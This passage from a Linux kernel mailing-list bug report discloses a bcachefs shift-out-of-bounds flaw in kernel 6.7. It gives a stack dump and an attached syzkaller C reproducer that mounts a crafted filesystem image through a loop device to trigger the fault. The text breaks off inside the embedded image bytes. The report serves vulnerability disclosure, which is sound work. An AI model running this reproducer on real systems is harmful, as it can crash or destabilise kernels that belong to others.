* UBSAN: shift-out-of-bounds in validate_sb_layout
@ 2024-05-20 7:02 Ubisectech Sirius
2024-05-20 14:31 ` Steven Rostedt
0 siblings, 1 reply; 3+ messages in thread
From: Ubisectech Sirius @ 2024-05-20 7:02 UTC (permalink / raw)
To: linux-trace-kernel, linux-kernel; +Cc: kent.overstreet
[-- Attachment #1: Type: text/plain, Size: 2139 bytes --]
Hello.
We are Ubisectech Sirius Team, the vulnerability lab of China ValiantSec. Recently, our team has discovered a issue in Linux kernel 6.7. Attached to the email were a PoC file of the issue.
Stack dump:
UBSAN: shift-out-of-bounds in fs/bcachefs/super-io.c:310:18
shift exponent 127 is too large for 32-bit type 'int'
CPU: 0 PID: 14408 Comm: syz-executor.3 Not tainted 6.7.0 #2
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0x136/0x150 lib/dump_stack.c:106
ubsan_epilogue lib/ubsan.c:217 [inline]
__ubsan_handle_shift_out_of_bounds+0x24b/0x430 lib/ubsan.c:387
validate_sb_layout.cold+0x1a/0x51 fs/bcachefs/super-io.c:310
bch2_read_super+0x980/0x1000 fs/bcachefs/super-io.c:786
bch2_fs_open+0x471/0x3890 fs/bcachefs/super.c:1922
bch2_mount+0x538/0x13c0 fs/bcachefs/fs.c:1863
legacy_get_tree+0x109/0x220 fs/fs_context.c:662
vfs_get_tree+0x93/0x380 fs/super.c:1771
do_new_mount fs/namespace.c:3337 [inline]
path_mount+0x679/0x1e40 fs/namespace.c:3664
do_mount fs/namespace.c:3677 [inline]
__do_sys_mount fs/namespace.c:3886 [inline]
__se_sys_mount fs/namespace.c:3863 [inline]
__x64_sys_mount+0x287/0x310 fs/namespace.c:3863
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0x43/0x120 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x6f/0x77
RIP: 0033:0x7f41e1091b3e
Code: 48 c7 c0 ff ff ff ff eb aa e8 be 0d 00 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 f3 0f 1e fa 49 89 ca b8 a5 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f41e1d22e38 EFLAGS: 00000202 ORIG_RAX: 00000000000000a5
RAX: ffffffffffffffda RBX: 0000000000005d82 RCX: 00007f41e1091b3e
RDX: 0000000020005d80 RSI: 0000000020000100 RDI: 00007f41e1d22e90
RBP: 00007f41e1d22ed0 R08: 00007f41e1d22ed0 R09: 0000000000000080
R10: 0000000000000080 R11: 0000000000000202 R12: 0000000020005d80
R13: 0000000020000100 R14: 00007f41e1d22e90 R15: 0000000020005e00
</TASK>
Thank you for taking the time to read this email and we look forward to working with you further.
[-- Attachment #2: poc.c --]
[-- Type: application/octet-stream, Size: 122605 bytes --]
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <setjmp.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#include <linux/loop.h>
#ifndef __NR_memfd_create
#define __NR_memfd_create 319
#endif
static unsigned long long procid;
//% This code is derived from puff.{c,h}, found in the zlib development. The
//% original files come with the following copyright notice:
//% Copyright (C) 2002-2013 Mark Adler, all rights reserved
//% version 2.3, 21 Jan 2013
//% This software is provided 'as-is', without any express or implied
//% warranty. In no event will the author be held liable for any damages
//% arising from the use of this software.
//% Permission is granted to anyone to use this software for any purpose,
//% including commercial applications, and to alter it and redistribute it
//% freely, subject to the following restrictions:
//% 1. The origin of this software must not be misrepresented; you must not
//% claim that you wrote the original software. If you use this software
//% in a product, an acknowledgment in the product documentation would be
//% appreciated but is not required.
//% 2. Altered source versions must be plainly marked as such, and must not be
//% misrepresented as being the original software.
//% 3. This notice may not be removed or altered from any source distribution.
//% Mark Adler madler@alumni.caltech.edu
//% BEGIN CODE DERIVED FROM puff.{c,h}
#define MAXBITS 15
#define MAXLCODES 286
#define MAXDCODES 30
#define MAXCODES (MAXLCODES + MAXDCODES)
#define FIXLCODES 288
struct puff_state {
unsigned char* out;
unsigned long outlen;
unsigned long outcnt;
const unsigned char* in;
unsigned long inlen;
unsigned long incnt;
int bitbuf;
int bitcnt;
jmp_buf env;
};
static int puff_bits(struct puff_state* s, int need)
{
long val = s->bitbuf;
while (s->bitcnt < need) {
if (s->incnt == s->inlen)
longjmp(s->env, 1);
val |= (long)(s->in[s->incnt++]) << s->bitcnt;
s->bitcnt += 8;
}
s->bitbuf = (int)(val >> need);
s->bitcnt -= need;
return (int)(val & ((1L << need) - 1));
}
static int puff_stored(struct puff_state* s)
{
s->bitbuf = 0;
s->bitcnt = 0;
if (s->incnt + 4 > s->inlen)
return 2;
unsigned len = s->in[s->incnt++];
len |= s->in[s->incnt++] << 8;
if (s->in[s->incnt++] != (~len & 0xff) ||
s->in[s->incnt++] != ((~len >> 8) & 0xff))
return -2;
if (s->incnt + len > s->inlen)
return 2;
if (s->outcnt + len > s->outlen)
return 1;
for (; len--; s->outcnt++, s->incnt++) {
if (s->in[s->incnt])
s->out[s->outcnt] = s->in[s->incnt];
}
return 0;
}
struct puff_huffman {
short* count;
short* symbol;
};
static int puff_decode(struct puff_state* s, const struct puff_huffman* h)
{
int first = 0;
int index = 0;
int bitbuf = s->bitbuf;
int left = s->bitcnt;
int code = first = index = 0;
int len = 1;
short* next = h->count + 1;
while (1) {
while (left--) {
code |= bitbuf & 1;
bitbuf >>= 1;
int count = *next++;
if (code - count < first) {
s->bitbuf = bitbuf;
s->bitcnt = (s->bitcnt - len) & 7;
return h->symbol[index + (code - first)];
}
index += count;
first += count;
first <<= 1;
code <<= 1;
len++;
}
left = (MAXBITS + 1) - len;
if (left == 0)
break;
if (s->incnt == s->inlen)
longjmp(s->env, 1);
bitbuf = s->in[s->incnt++];
if (left > 8)
left = 8;
}
return -10;
}
static int puff_construct(struct puff_huffman* h, const short* length, int n)
{
int len;
for (len = 0; len <= MAXBITS; len++)
h->count[len] = 0;
int symbol;
for (symbol = 0; symbol < n; symbol++)
(h->count[length[symbol]])++;
if (h->count[0] == n)
return 0;
int left = 1;
for (len = 1; len <= MAXBITS; len++) {
left <<= 1;
left -= h->count[len];
if (left < 0)
return left;
}
short offs[MAXBITS + 1];
offs[1] = 0;
for (len = 1; len < MAXBITS; len++)
offs[len + 1] = offs[len] + h->count[len];
for (symbol = 0; symbol < n; symbol++)
if (length[symbol] != 0)
h->symbol[offs[length[symbol]]++] = symbol;
return left;
}
static int puff_codes(struct puff_state* s, const struct puff_huffman* lencode,
const struct puff_huffman* distcode)
{
static const short lens[29] = {3, 4, 5, 6, 7, 8, 9, 10, 11, 13,
15, 17, 19, 23, 27, 31, 35, 43, 51, 59,
67, 83, 99, 115, 131, 163, 195, 227, 258};
static const short lext[29] = {0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2,
2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 0};
static const short dists[30] = {
1, 2, 3, 4, 5, 7, 9, 13, 17, 25,
33, 49, 65, 97, 129, 193, 257, 385, 513, 769,
1025, 1537, 2049, 3073, 4097, 6145, 8193, 12289, 16385, 24577};
static const short dext[30] = {0, 0, 0, 0, 1, 1, 2, 2, 3, 3,
4, 4, 5, 5, 6, 6, 7, 7, 8, 8,
9, 9, 10, 10, 11, 11, 12, 12, 13, 13};
int symbol;
do {
symbol = puff_decode(s, lencode);
if (symbol < 0)
return symbol;
if (symbol < 256) {
if (s->outcnt == s->outlen)
return 1;
if (symbol)
s->out[s->outcnt] = symbol;
s->outcnt++;
} else if (symbol > 256) {
symbol -= 257;
if (symbol >= 29)
return -10;
int len = lens[symbol] + puff_bits(s, lext[symbol]);
symbol = puff_decode(s, distcode);
if (symbol < 0)
return symbol;
unsigned dist = dists[symbol] + puff_bits(s, dext[symbol]);
if (dist > s->outcnt)
return -11;
if (s->outcnt + len > s->outlen)
return 1;
while (len--) {
if (dist <= s->outcnt && s->out[s->outcnt - dist])
s->out[s->outcnt] = s->out[s->outcnt - dist];
s->outcnt++;
}
}
} while (symbol != 256);
return 0;
}
static int puff_fixed(struct puff_state* s)
{
static int virgin = 1;
static short lencnt[MAXBITS + 1], lensym[FIXLCODES];
static short distcnt[MAXBITS + 1], distsym[MAXDCODES];
static struct puff_huffman lencode, distcode;
if (virgin) {
lencode.count = lencnt;
lencode.symbol = lensym;
distcode.count = distcnt;
distcode.symbol = distsym;
short lengths[FIXLCODES];
int symbol;
for (symbol = 0; symbol < 144; symbol++)
lengths[symbol] = 8;
for (; symbol < 256; symbol++)
lengths[symbol] = 9;
for (; symbol < 280; symbol++)
lengths[symbol] = 7;
for (; symbol < FIXLCODES; symbol++)
lengths[symbol] = 8;
puff_construct(&lencode, lengths, FIXLCODES);
for (symbol = 0; symbol < MAXDCODES; symbol++)
lengths[symbol] = 5;
puff_construct(&distcode, lengths, MAXDCODES);
virgin = 0;
}
return puff_codes(s, &lencode, &distcode);
}
static int puff_dynamic(struct puff_state* s)
{
static const short order[19] = {16, 17, 18, 0, 8, 7, 9, 6, 10, 5,
11, 4, 12, 3, 13, 2, 14, 1, 15};
int nlen = puff_bits(s, 5) + 257;
int ndist = puff_bits(s, 5) + 1;
int ncode = puff_bits(s, 4) + 4;
if (nlen > MAXLCODES || ndist > MAXDCODES)
return -3;
short lengths[MAXCODES];
int index;
for (index = 0; index < ncode; index++)
lengths[order[index]] = puff_bits(s, 3);
for (; index < 19; index++)
lengths[order[index]] = 0;
short lencnt[MAXBITS + 1], lensym[MAXLCODES];
struct puff_huffman lencode = {lencnt, lensym};
int err = puff_construct(&lencode, lengths, 19);
if (err != 0)
return -4;
index = 0;
while (index < nlen + ndist) {
int symbol;
int len;
symbol = puff_decode(s, &lencode);
if (symbol < 0)
return symbol;
if (symbol < 16)
lengths[index++] = symbol;
else {
len = 0;
if (symbol == 16) {
if (index == 0)
return -5;
len = lengths[index - 1];
symbol = 3 + puff_bits(s, 2);
} else if (symbol == 17)
symbol = 3 + puff_bits(s, 3);
else
symbol = 11 + puff_bits(s, 7);
if (index + symbol > nlen + ndist)
return -6;
while (symbol--)
lengths[index++] = len;
}
}
if (lengths[256] == 0)
return -9;
err = puff_construct(&lencode, lengths, nlen);
if (err && (err < 0 || nlen != lencode.count[0] + lencode.count[1]))
return -7;
short distcnt[MAXBITS + 1], distsym[MAXDCODES];
struct puff_huffman distcode = {distcnt, distsym};
err = puff_construct(&distcode, lengths + nlen, ndist);
if (err && (err < 0 || ndist != distcode.count[0] + distcode.count[1]))
return -8;
return puff_codes(s, &lencode, &distcode);
}
static int puff(unsigned char* dest, unsigned long* destlen,
const unsigned char* source, unsigned long sourcelen)
{
struct puff_state s = {
.out = dest,
.outlen = *destlen,
.outcnt = 0,
.in = source,
.inlen = sourcelen,
.incnt = 0,
.bitbuf = 0,
.bitcnt = 0,
};
int err;
if (setjmp(s.env) != 0)
err = 2;
else {
int last;
do {
last = puff_bits(&s, 1);
int type = puff_bits(&s, 2);
err = type == 0 ? puff_stored(&s)
: (type == 1 ? puff_fixed(&s)
: (type == 2 ? puff_dynamic(&s) : -1));
if (err != 0)
break;
} while (!last);
}
*destlen = s.outcnt;
return err;
}
//% END CODE DERIVED FROM puff.{c,h}
#define ZLIB_HEADER_WIDTH 2
static int puff_zlib_to_file(const unsigned char* source,
unsigned long sourcelen, int dest_fd)
{
if (sourcelen < ZLIB_HEADER_WIDTH)
return 0;
source += ZLIB_HEADER_WIDTH;
sourcelen -= ZLIB_HEADER_WIDTH;
const unsigned long max_destlen = 132 << 20;
void* ret = mmap(0, max_destlen, PROT_WRITE | PROT_READ,
MAP_PRIVATE | MAP_ANON, -1, 0);
if (ret == MAP_FAILED)
return -1;
unsigned char* dest = (unsigned char*)ret;
unsigned long destlen = max_destlen;
int err = puff(dest, &destlen, source, sourcelen);
if (err) {
munmap(dest, max_destlen);
errno = -err;
return -1;
}
if (write(dest_fd, dest, destlen) != (ssize_t)destlen) {
munmap(dest, max_destlen);
return -1;
}
return munmap(dest, max_destlen);
}
static int setup_loop_device(unsigned char* data, unsigned long size,
const char* loopname, int* loopfd_p)
{
int err = 0, loopfd = -1;
int memfd = syscall(__NR_memfd_create, "syzkaller", 0);
if (memfd == -1) {
err = errno;
goto error;
}
if (puff_zlib_to_file(data, size, memfd)) {
err = errno;
goto error_close_memfd;
}
loopfd = open(loopname, O_RDWR);
if (loopfd == -1) {
err = errno;
goto error_close_memfd;
}
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
if (errno != EBUSY) {
err = errno;
goto error_close_loop;
}
ioctl(loopfd, LOOP_CLR_FD, 0);
usleep(1000);
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
err = errno;
goto error_close_loop;
}
}
close(memfd);
*loopfd_p = loopfd;
return 0;
error_close_loop:
close(loopfd);
error_close_memfd:
close(memfd);
error:
errno = err;
return -1;
}
static void reset_loop_device(const char* loopname)
{
int loopfd = open(loopname, O_RDWR);
if (loopfd == -1) {
return;
}
if (ioctl(loopfd, LOOP_CLR_FD, 0)) {
}
close(loopfd);
}
static long syz_mount_image(volatile long fsarg, volatile long dir,
volatile long flags, volatile long optsarg,
volatile long change_dir,
volatile unsigned long size, volatile long image)
{
unsigned char* data = (unsigned char*)image;
int res = -1, err = 0, need_loop_device = !!size;
char* mount_opts = (char*)optsarg;
char* target = (char*)dir;
char* fs = (char*)fsarg;
char* source = NULL;
char loopname[64];
if (need_loop_device) {
int loopfd;
memset(loopname, 0, sizeof(loopname));
snprintf(loopname, sizeof(loopname), "/dev/loop%llu", procid);
if (setup_loop_device(data, size, loopname, &loopfd) == -1)
return -1;
close(loopfd);
source = loopname;
}
mkdir(target, 0777);
char opts[256];
memset(opts, 0, sizeof(opts));
if (strlen(mount_opts) > (sizeof(opts) - 32)) {
}
strncpy(opts, mount_opts, sizeof(opts) - 32);
if (strcmp(fs, "iso9660") == 0) {
flags |= MS_RDONLY;
} else if (strncmp(fs, "ext", 3) == 0) {
bool has_remount_ro = false;
char* remount_ro_start = strstr(opts, "errors=remount-ro");
if (remount_ro_start != NULL) {
char after = *(remount_ro_start + strlen("errors=remount-ro"));
char before = remount_ro_start == opts ? '\0' : *(remount_ro_start - 1);
has_remount_ro = ((before == '\0' || before == ',') &&
(after == '\0' || after == ','));
}
if (strstr(opts, "errors=panic") || !has_remount_ro)
strcat(opts, ",errors=continue");
} else if (strcmp(fs, "xfs") == 0) {
strcat(opts, ",nouuid");
}
res = mount(source, target, fs, flags, opts);
if (res == -1) {
err = errno;
goto error_clear_loop;
}
res = open(target, O_RDONLY | O_DIRECTORY);
if (res == -1) {
err = errno;
goto error_clear_loop;
}
if (change_dir) {
res = chdir(target);
if (res == -1) {
err = errno;
}
}
error_clear_loop:
if (need_loop_device)
reset_loop_device(loopname);
errno = err;
return res;
}
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1,
/*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1,
/*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1,
/*offset=*/0ul);
memcpy((void*)0x20005d80, "bcachefs\000", 9);
memcpy((void*)0x20000100, "./file0\000", 8);
*(uint16_t*)0x20005e00 = -1;
memcpy(
(void*)0x20005f80,
"\x78\x9c\xec\xdd\x7d\x90\x1c\xe5\x99\x18\xf0\xee\x99\x59\xed\x4a\xab\x8f"
"\x95\x2c\x9b\x15\x12\x62\x31\xb2\x1d\x71\xc1\x16\x28\x10\xcb\x77\x8e\x36"
"\xce\xd9\xb1\x1d\x19\x64\x61\x01\x16\xa7\x93\x64\x58\xd9\x3a\x84\x24\xf4"
"\x81\x40\xba\x84\xaf\x1c\x10\x4c\x52\xaa\x82\x3a\x08\xc4\x57\x3a\xa0\xb8"
"\xab\xd4\x55\x02\xa5\x4b\x08\x77\x4a\x95\x8c\x01\x5f\xf9\xaa\x28\x64\xe2"
"\x3f\x38\xf2\x75\x54\x70\xfe\x88\x8f\xa8\xce\x12\x47\x24\x97\x37\xb5\xbb"
"\xdd\xbb\x33\xbd\xfd\x4e\xcf\x4e\xcf\x0a\xc1\xfd\x7e\x55\xda\xd9\xb7\xf7"
"\x99\xe7\x7d\x9e\xde\x77\x7a\xba\x47\xbb\xb3\x11\x00\x00\x00\x7f\x2b\xbc"
"\xf2\x3b\x7b\xde\xbd\xea\xfc\x2f\xfe\xe8\x9e\xa1\x53\x77\x7e\xf9\x4f\x6e"
"\xb9\x3b\xba\xb3\x3a\xba\xbd\x27\x0d\xe8\x4b\x6e\x6f\x7f\xbf\x2a\x64\x3a"
"\x2d\xff\xf1\x99\x86\xef\x6c\x77\xad\x7f\xf4\x36\xbb\x2e\xce\xfb\xd3\x85"
"\xef\xf6\xdd\xbb\xe6\x6b\x0f\xae\xfa\xd2\x8f\x37\xff\xd9\xfc\xc1\xa5\xcb"
"\x86\xae\x7c\xee\xc8\xd5\xf7\xdd\xfb\xe2\xe7\x7f\xf1\xe2\xa3\x8f\xaf\x29"
"\x9a\x27\x5d\x4f\x97\x4c\x8c\xe3\xbf\x8a\xa3\x68\xe9\xdb\x47\x1e\xbd\xef"
"\xe5\x3f\x3f\x6f\x64\x5b\x3c\x32\x7f\xdc\x77\x57\x34\x7f\x7e\xbc\xe0\xfb"
"\xf3\xe3\x4c\x8a\x15\xa7\xa3\x28\xba\x69\xbc\xce\xc6\x2f\x1e\x39\xb5\x72"
"\xeb\xc8\xed\xdd\xdf\xed\x6e\xd8\x3e\x2f\x93\x64\xd2\x7a\xef\xb5\xde\xff"
"\x36\xe9\x49\xd6\xd9\xc1\x4d\xdf\x7a\xf2\xd8\xcd\x83\x2f\x1f\x19\xd8\xb5"
"\xf2\x67\x27\xaf\xd8\x79\xd7\x44\x48\xdc\x53\xb7\x9e\xa2\x68\xee\xe6\xfa"
"\xfb\x77\x45\x51\x34\x33\xf9\x37\x22\x5d\x6d\xfd\xe9\x9d\x93\xdb\xb5\x51"
"\x14\xcd\xaa\xbb\xdf\x67\x0b\xea\xba\xb8\xc5\xfa\x2f\x0d\x8c\x97\x24\xb7"
"\x33\x92\xdb\xde\x82\x3c\xe9\xd7\x2f\xca\x8c\x6b\x2d\xd6\x51\xcb\xdc\x76"
"\xb7\x78\xbf\x76\x55\xa6\x39\x7f\x56\x76\xff\x65\x0f\x46\xd3\x25\xed\x73"
"\x6e\x72\xfb\x7c\x72\x7b\xc9\x14\xf3\x54\xd3\x7f\x71\x54\x89\xa3\xda\x78"
"\xf9\xdb\xe3\x89\x35\x12\xd5\x7d\xdf\xe2\x28\x1e\x5d\xdb\x3d\xe3\xe3\xca"
"\xe8\x38\x1a\x1f\x47\xd9\x71\x9c\x19\x57\x32\xe3\x6a\x57\xa6\xaf\xd1\x79"
"\x93\x1d\x5b\x8d\xe3\xc6\xed\x69\x5c\x66\x7b\x7a\x38\xae\x25\xdb\x2f\xaa"
"\x3f\x56\xe7\x58\x97\xdd\x90\x2c\xd0\x45\xc9\xb0\x27\x79\xa0\xbe\x97\x8e"
"\xa3\xec\x27\x63\x7a\x27\x7d\x32\xd1\x47\x54\x57\xd7\x89\xb3\xb5\x30\x02"
"\x2a\x81\xc7\x5e\xba\x7d\xbc\xbc\xe4\x9b\xd1\x9b\x6c\xeb\x8d\x17\x4c\xba"
"\xcf\x70\x8e\xf4\x6b\x27\x7e\xb8\x65\xc3\x3b\x6f\x1c\x78\xbe\x2f\x50\x47"
"\xfc\x6c\x9c\xe4\x8f\xdb\xca\x3f\x38\xf4\xc4\xb1\x67\xae\x3f\xba\xa8\x3f"
"\x94\x7f\x73\x25\xc9\x5f\x69\x2b\xff\x2b\xd5\x57\x4f\x3f\x7d\xb2\x7f\x76"
"\x30\xff\xa1\x34\x7f\xb5\xad\xfc\xeb\x7f\xf9\xd3\x07\xee\xb9\x66\xff\xc2"
"\xe0\xfe\x39\x91\xee\x9f\x5a\x5b\xf9\x97\x3d\x34\xfb\xe0\xa9\xfd\xeb\xba"
"\x07\x42\xf9\x0f\xa7\xf9\x7b\xda\xca\x7f\xe5\xc6\xa5\xab\x2e\x38\xb9\xef"
"\xb6\x60\xfd\x2b\xd2\xfd\x33\xb3\xad\xfc\x3f\x79\x78\xf9\x99\x8d\x87\x5e"
"\x38\x1a\xcc\x1f\xa5\xf9\x67\xb5\x95\xff\xcd\x27\x9e\x5a\x52\x5d\xf4\xc8"
"\xf1\x60\xfe\x63\xe9\xfe\xe9\x6d\x2b\xff\xb5\x2b\x1f\x5b\xfd\xd5\xc5\xf7"
"\x3e\x1e\xdc\xff\xaf\xa5\xf9\xe7\xb4\x95\x7f\xc3\xf1\xfb\x36\xef\x7a\xf2"
"\xa5\xe5\xc1\xf5\xb9\x36\xdd\x3f\x7d\x6d\xe5\x3f\xbd\xfa\xf5\xb7\xce\xf4"
"\xad\x79\x2a\x74\xec\x8c\x0f\x9f\xed\x67\x58\x80\x0f\x97\x8f\x24\xe7\x58"
"\x0f\x24\xe3\x76\xaf\x33\xcb\xaa\xbb\x5e\x78\x6c\xa0\x36\x76\xce\x37\x3b"
"\xf9\x37\xa7\x93\x13\x65\xc4\x75\xd7\x2e\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
